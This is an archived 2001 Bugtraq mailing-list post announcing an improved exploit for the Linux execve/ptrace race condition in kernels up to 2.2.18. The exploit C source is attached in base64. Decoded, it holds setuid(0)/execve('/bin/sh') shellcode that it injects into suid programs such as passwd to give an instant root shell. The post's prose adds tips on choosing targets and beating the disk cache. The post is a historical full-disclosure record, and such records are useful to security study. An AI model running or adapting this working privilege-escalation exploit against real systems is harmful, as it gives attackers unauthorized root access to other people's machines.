[19983] in bugtraq
.. ptrace improvement
daemon@ATHENA.MIT.EDU (Tim Yardley)
Sun Apr 1 13:24:15 2001
Mime-Version: 1.0
Content-Type: multipart/mixed; boundary="=====================_331668363==_"
Message-ID: <5.0.2.1.2.20010331200447.02f6a048@students.uiuc.edu>
Date: Sat, 31 Mar 2001 20:12:01 -0600
Reply-To: Tim Yardley <yardley@UIUC.EDU>
From: Tim Yardley <yardley@UIUC.EDU>
To: BUGTRAQ@SECURITYFOCUS.COM
--=====================_331668363==_
Content-Type: text/plain; charset="us-ascii"; format=flowed
As always, there are always ways to improve things. This version of the
exploit posted here previously overwrites the dl _start routine and doesnt
modify eip. This will help on stack non-exec systems and doesnt require
you to calculate the bss offset. I didn't test it, but this should still
work on a stackguard compiled program as well.
your mileage may vary, and this will still suffer from the disk cache issue
(speed becoming a paramount concern). the recent post by "Ihq" where his
exploit created a big file, is one way to fill out the cache so that the
suid binary is not in the cache. manual methods are just as easy.
rsh, gpasswd, passwd, etc etc are all common choices for hitting. anything
will work.
more details lay within the code. enjoy.
/tmy
--=====================_331668363==_
Content-Type: text/plain; name="epcs2.c";
x-mac-type="42494E41"; x-mac-creator="74747874"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="epcs2.c"
LyoKICogZXBjczIgKGltcHJvdmVkIGJ5IGxzdCBbbGlxdWlkQGRxYy5vcmddKQogKiB+fn5+fn5+
CiAqIGV4cGxvaXQgZm9yIGV4ZWN2ZS9wdHJhY2UgcmFjZSBjb25kaXRpb24gaW4gTGludXgga2Vy
bmVsIHVwIHRvIDIuMi4xOAogKgogKiBvcmlnaW5hbGx5IGJ5OgogKiAoYykgMjAwMSBXb2pjaWVj
aCBQdXJjenluc2tpIC8gY2xpcGggLyA8d3BAZWx6YWJzb2Z0LnBsPgogKgogKiBpbXByb3ZlZCBi
eToKICogbHN0IFtsaXF1aWRAZHFjLm9yZ10KICoKICogVGhpcyBzcGxvaXQgZG9lcyBfbm90XyB1
c2UgYnJ1dGUgZm9yY2UuIEl0IGRvZXMgbm90IG5lZWQgdGhhdC4KICogSXQgZG9lcyBvbmx5IG9u
ZSBhdHRlbXQgdG8gc3Bsb2l0IHRoZSByYWNlIGNvbmRpdGlvbiBpbiBleGVjdmUuIAogKiBQYXJl
bnQgcHJvY2VzcyB3YWl0cyBmb3IgYSBjb250ZXh0LXN3aXRjaCB0aGF0IG9jY3VyIGFmdGVyIAog
KiBjaGlsZCB0YXNrIHNsZWVwIGluIGV4ZWN2ZS4KICoKICogSXQgc2hvdWxkIHdvcmsgZXZlbiBv
biBvcGVud2FsbC1wYXRjaGVkIGtlcm5lbHMgKEkgaGF2ZW4ndCB0ZXN0ZWQgaXQpLgogKgogKiBD
b21waWxlIGl0OgogKgljYyBlcGNzLmMgLW8gZXBjcwogKiBVc2FnZToKICoJLi9lcGNzIFt2aWN0
aW1dCiAqCiAqIEl0IGdpdmVzIGluc3RhbnQgcm9vdCBzaGVsbCB3aXRoIGFueSBvZiBhIHN1aWQg
YmluYXJpZXMuCiAqCiAqIElmIGl0IGRvZXMgbm90IHdvcmssIHRyeSB1c2Ugc29tZSBtZXRob2Rz
IHRvIGVuc3VyZSB0aGF0IGV4ZWN2ZQogKiB3b3VsZCBzbGVlcCB3aGlsZSBsb2FkaW5nIGJpbmFy
eSBmaWxlIGludG8gbWVtb3J5LAogKgogKiAJaS5lLjogY2F0IC91c3IvbGliLyogPi9kZXYvbnVs
bCAyPiYxCiAqCiAqIFRlc3RlZCBvbiBSSCA3LjAgYW5kIFJIIDYuMiAvIDIuMi4xNCAvIDIuMi4x
OCAvIDIuMi4xOG93NAogKiBUaGlzIGV4cGxvaXQgZG9lcyBub3Qgd29yayBvbiAyLjQueCBiZWNh
dXNlIGtlcm5lbCB3b24ndCBzZXQgc3VpZCAKICogcHJpdmlsZWdlcyBpZiB1c2VyIHB0cmFjZXMg
YSBiaW5hcnkuCiAqIEJ1dCBpdCBpcyBzdGlsbCBleHBsb2l0YWJsZSBvbiB0aGVzZSBrZXJuZWxz
LgogKgogKiBUaGFua3MgdG8gQnVsYmEgKGhlIG1hZGUgbWUgdG8gdGFrZSBhIGxvb2sgYXQgdGhp
cyBidWcgOykgKQogKiBHcmVldGluZ3MgdG8gU2lnU2VndiB0ZWFtLgogKgogKiAtLSBkMDB0CiAq
IGltcHJvdmVkIGJ5IGxzdCBbbGlxdWlkQGRxYy5vcmddCiAqIHByb3BzIHRvIGtldmluIGZvciBt
b3N0IG9mIHRoZSB3b3JrCiAqCiAqIG5vdyB3b3JrcyBvbiBzdGFjayBub24tZXhlYyBzeXN0ZW1z
IHdpdGggc29tZSBuZWF0IHRyaWNrZXJ5IGZvciB0aGUgYXV0b21hdGVkCiAqIG1ldGhvZCwgaWUu
IG5vIG5lZWQgdG8gZmluZCB0aGUgYnNzIHNlZ21lbnQgdmlhIG9iamR1bXAKICoKICogcGFydGlj
dWxhcmx5IGl0IG5vdyByZXdyaXRlcyB0aGUgY29kZSBpbnN0cnVjdGlvbiBzZXRzIGluIHRoZSAK
ICogZHluYW1pYyBsaW5rZXIgX3N0YXJ0IHNlZ21lbnQgYW5kIGNvbnRpbnVlcyBleGVjdXRpb24g
ZnJvbSB0aGVyZS4KICogCiAqIGFuIGFzaWRlLCBkdWUgdG8gdGhlIGZhY3QgdGhhdCB0aGUgY29k
ZSBzZWxmLW1vZGlmaWVkLCBpdCB3b3VsZG50IHdvcmsKICogcXVpdGUgY29ycmVjdGx5IG9uIGEg
c3RhY2sgbm9uLWV4ZWMgc3lzdGVtIHdpdGhvdXQgcGxheWluZyBkaXJlY3RseSB3aXRoCiAqIHRo
ZSBic3Mgc2VnbWVudCAoaWUgbm8gcmVncy5laXAgPSByZWdzLmVzcCBjaGFuZ2UpLiAgdGhpcyBp
cyBtdWNoIG1vcmUgCiAqIGF1dG9tYXRlZC4gIGhvd2V2ZXIsIGRvIG5vdGUgdGhhdCB0aGUgcHJl
dmlvdXMgdmVyc2lvbiBkaWQgbm90IHRyaWdnZXIgc3RhY2sgCiAqIG5vbi1leGVjIHdhcm5pbmdz
IGR1ZSB0byBob3cgaXQgd2FzIG9wZXJhdGluZy4gIG5vdGUgdGhhdCB0aGUgcmVncy5laXAgPSBy
ZWdzLmVzcCAKICogbWV0aG9kIHdpbGwgYnJlYWsgb24gc3RhY2sgbm9uLWV4ZWMgc3lzdGVtcy4K
ICoKICogYXMgYWx3YXlzLi4gZW5qb3kuCiAqCiAqLwoKI2luY2x1ZGUgPHN0ZGlvLmg+CiNpbmNs
dWRlIDxmY250bC5oPgojaW5jbHVkZSA8c3lzL3R5cGVzLmg+CiNpbmNsdWRlIDxzaWduYWwuaD4K
I2luY2x1ZGUgPGxpbnV4L3VzZXIuaD4KI2luY2x1ZGUgPHN5cy93YWl0Lmg+CiNpbmNsdWRlIDxs
aW1pdHMuaD4KI2luY2x1ZGUgPGVycm5vLmg+CiNpbmNsdWRlIDxzdGRsaWIuaD4KCiNkZWZpbmUg
Q1NfU0lHTkFMIFNJR1VTUjEKI2RlZmluZSBWSUNUSU0gIi91c3IvYmluL3Bhc3N3ZCIKI2RlZmlu
ZSBTSEVMTCAiL2Jpbi9zaCIKCi8qCiAqIG1vZGlmaWVkIHNpbXBsZSBzaGVsbCBjb2RlIHdpdGgg
c29tZSB0cmlja2VyeSAoaGFuZCB0d2Vha3MpCiAqLwpjaGFyIHNoZWxsY29kZVtdPQoJIlx4OTBc
eDkwXHg5MFx4OTBceDkwXHg5MFx4OTBceDkwXHg5MCIKCSJceDMxXHhjMFx4MzFceGRiXHhiMFx4
MTdceGNkXHg4MCIJCS8qIHNldHVpZCgwKSAqLwoJIlx4MzFceGMwXHhiMFx4MmVceGNkXHg4MCIK
CSJceDMxXHhjMFx4NTBceGViXHgxN1x4OGJceDFjXHgyNCIJCS8qIGV4ZWN2ZShTSEVMTCkgKi8K
CSJceDkwXHg5MFx4OTBceDg5XHhlMVx4OGRceDU0XHgyNCIJCS8qIGxldHMgYmUgdHJpY2t5ICov
CgkiXHgwNFx4YjBceDBiXHhjZFx4ODBceDMxXHhjMFx4ODkiCgkiXHhjM1x4NDBceGNkXHg4MFx4
ZThceGU0XHhmZlx4ZmYiCgkiXHhmZiIgU0hFTEwgIlx4MDBceDAwXHgwMCIgOwkJCS8qIHBhZCBt
ZSAqLwoKdm9sYXRpbGUgaW50IGNzX2RldGVjdG9yPTA7Cgp2b2lkIGNzX3NpZ19oYW5kbGVyKGlu
dCBzaWcpCnsKCWNzX2RldGVjdG9yPTE7Cn0KCnZvaWQgZG9fdmljdGltKGNoYXIgKiBmaWxlbmFt
ZSkKewoJd2hpbGUgKCFjc19kZXRlY3RvcikgOwoJa2lsbChnZXRwcGlkKCksIENTX1NJR05BTCk7
CglleGVjbChmaWxlbmFtZSwgZmlsZW5hbWUsIE5VTEwpOwoJcGVycm9yKCJleGVjbCIpOwoJZXhp
dCgtMSk7Cn0KCmludCBjaGVja19leGVjdmUocGlkX3QgdmljdGltLCBjaGFyICogZmlsZW5hbWUp
CnsKCWNoYXIgcGF0aFtQQVRIX01BWCsxXTsKCWNoYXIgbGlua1tQQVRIX01BWCsxXTsKCWludCBy
ZXM7CgkKCXNucHJpbnRmKHBhdGgsIHNpemVvZihwYXRoKSwgIi9wcm9jLyVpL2V4ZSIsIChpbnQp
dmljdGltKTsKCWlmIChyZWFkbGluayhwYXRoLCBsaW5rLCBzaXplb2YobGluayktMSk8MCkgewoJ
CXBlcnJvcigicmVhZGxpbmsiKTsKCQlyZXR1cm4gLTE7Cgl9CgkKCWxpbmtbc2l6ZW9mKGxpbmsp
LTFdPSdcMCc7CglyZXM9IXN0cmNtcChsaW5rLCBmaWxlbmFtZSk7CglpZiAocmVzKSBmcHJpbnRm
KHN0ZGVyciwgImNoaWxkIHNsZXB0IG91dHNpZGUgb2YgZXhlY3ZlXG4iKTsKCXJldHVybiByZXM7
Cn0KCmludCBtYWluKGludCBhcmdjLCBjaGFyICogYXJndltdKQp7CgljaGFyICogZmlsZW5hbWU9
VklDVElNOwoJcGlkX3QgdmljdGltOwoJaW50IGVycm9yLCBpOwoJc3RydWN0IHVzZXJfcmVnc19z
dHJ1Y3QgcmVnczsKCgkvKiB0YWtlIG91ciBjb21tYW5kIGFyZ3MgaWYgeW91IHdhbm5hIHBsYXkg
d2l0aCBvdGhlciBwcm9ncyAqLwoJaWYgKGFyZ2M+MSkgZmlsZW5hbWU9YXJndlsxXTsKCglzaWdu
YWwoQ1NfU0lHTkFMLCBjc19zaWdfaGFuZGxlcik7CgoJdmljdGltPWZvcmsoKTsKCWlmICh2aWN0
aW08MCkgewoJCXBlcnJvcigiZm9yazogdmljdGltIik7CgkJZXhpdCgtMSk7Cgl9CglpZiAodmlj
dGltPT0wKSBkb192aWN0aW0oZmlsZW5hbWUpOwoKCWtpbGwodmljdGltLCBDU19TSUdOQUwpOwoJ
d2hpbGUgKCFjc19kZXRlY3RvcikgOwoJCglpZiAocHRyYWNlKFBUUkFDRV9BVFRBQ0gsIHZpY3Rp
bSkpIHsKCQlwZXJyb3IoInB0cmFjZTogUFRSQUNFX0FUVEFDSCIpOwoJCWdvdG8gZXhpdDsKCX0K
CQoJaWYgKGNoZWNrX2V4ZWN2ZSh2aWN0aW0sIGZpbGVuYW1lKSkKCQlnb3RvIGV4aXQ7CgoJKHZv
aWQpd2FpdHBpZCh2aWN0aW0sIE5VTEwsIFdVTlRSQUNFRCk7CglpZiAocHRyYWNlKFBUUkFDRV9D
T05ULCB2aWN0aW0sIDAsIDApKSB7CgkJcGVycm9yKCJwdHJhY2U6IFBUUkFDRV9DT05UIik7CgkJ
Z290byBleGl0OwoJfQoKCSh2b2lkKXdhaXRwaWQodmljdGltLCBOVUxMLCBXVU5UUkFDRUQpOwoJ
CglpZiAocHRyYWNlKFBUUkFDRV9HRVRSRUdTLCB2aWN0aW0sIDAsICZyZWdzKSkgewoJCXBlcnJv
cigicHRyYWNlOiBQVFJBQ0VfR0VUUkVHUyIpOwoJCWdvdG8gZXhpdDsKCX0KCgkvKiBtYWtlIHN1
cmUgdGhhdCBsYXN0IG51bGwgaXMgaW4gdGhlcmUgKi8KCWZvciAoaT0wOyBpPD1zdHJsZW4oc2hl
bGxjb2RlKTsgaSs9NCkgewoJCWlmIChwdHJhY2UoUFRSQUNFX1BPS0VURVhULCB2aWN0aW0sIHJl
Z3MuZWlwK2ksCgkJCQkJCSAgICAqKGludCopKHNoZWxsY29kZStpKSkpIHsKCQkJcGVycm9yKCJw
dHJhY2U6IFBUUkFDRV9QT0tFVEVYVCIpOwoJCQlnb3RvIGV4aXQ7CgkJfQoJfQoKCWlmIChwdHJh
Y2UoUFRSQUNFX1NFVFJFR1MsIHZpY3RpbSwgMCwgJnJlZ3MpKSB7CgkJcGVycm9yKCJwdHJhY2U6
IFBUUkFDRV9TRVRSRUdTIik7CgkJZ290byBleGl0OwoJfQoKCWZwcmludGYoc3RkZXJyLCAiYnVn
IGV4cGxvaXRlZCBzdWNjZXNzZnVsbHkuXG5lbmpveSFcbiIpOwoJCglpZiAocHRyYWNlKFBUUkFD
RV9ERVRBQ0gsIHZpY3RpbSwgMCwgMCkpIHsKCQlwZXJyb3IoInB0cmFjZTogUFRSQUNFX0RFVEFD
SCIpOwoJCWdvdG8gZXhpdDsKCX0KCgkodm9pZCl3YWl0cGlkKHZpY3RpbSwgTlVMTCwgMCk7Cgly
ZXR1cm4gMDsKCQpleGl0OgoJZnByaW50ZihzdGRlcnIsICJkMGghIGVycm9yIVxuIik7CglraWxs
KHZpY3RpbSwgU0lHS0lMTCk7CglyZXR1cm4gLTE7Cn0=
--=====================_331668363==_
Content-Type: text/plain; charset="us-ascii"; format=flowed
-- Diving into infinity my consciousness expands in inverse
proportion to my distance from singularity
+-------- ------- ------ ----- ---- --- -- --- ------ ------- -------- -
--------------+
| Tim Yardley (yardley@uiuc.edu)
| http://www.students.uiuc.edu/~yardley/
+-------- ------- ------ ----- ---- --- -- --- ------ ------- -------- -
--------------+
--=====================_331668363==_--
